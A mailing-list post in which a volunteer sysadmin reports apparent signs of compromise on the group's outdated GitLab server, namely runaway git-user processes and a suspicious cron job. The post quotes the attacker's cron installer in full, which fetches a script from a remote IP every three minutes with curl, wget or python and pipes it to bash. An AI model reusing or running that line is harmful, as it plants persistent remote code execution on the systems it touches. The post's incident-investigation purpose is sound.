[Adminsysters] Debug gitlab
mara
mara at multiplace.org
Fri Jan 21 10:41:21 CET 2022
I sshed and saw the htop stats running in the session
"server". Git user was running a couple of processes with the same weird
command '7432xxxx'. See the screenshot attached. These processes were
consuming ~100% CPU.
I installed strace to see what this command is doing, during the
installation of strace, I got a message that gitlab-runsvdir.service was
running outdated libraries and needed restart, I pressed OK, and strace
continued its installation.
After that, the above git processes were not there anymore.
Now, I don't know how this could be related to bandwidth, and if it is.
But our gitlab is running a rather old version, and it urgently needs
upgrade, see related issue:
https://git.systerserver.net/systerserver/notes/issues/40
Also last month, while looking into crontab for our backups automate
policy, we noticed the following weird cron job running with git, every
3min ->
===
#!/bin/sh
url="http://112.51.247.232:8088/Adobe/conf"
echo "*/3 * * * * (curl -fsSL $url||wget -q -O- $url||python -c 'import
urllib2 as fbi;print fbi.urlopen(\"$url\").read()')| bash -sh" | crontab -
===
which reads the body of the above url and pipes it to bash. A whoseip
showed a chinese mobile operator.
ignifugo mentioned something about a vulnerability exploit when we
discussed it in our meetings during rc3.
Anyhow I checked again if git is running any cronjobs, but no.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: adele-weird-git-process.png
Type: image/png
Size: 108443 bytes
Desc: not available
URL: <http://lists.genderchangers.org/pipermail/adminsysters/attachments/20220121/577997a2/attachment-0001.png>
More information about the Adminsysters
mailing list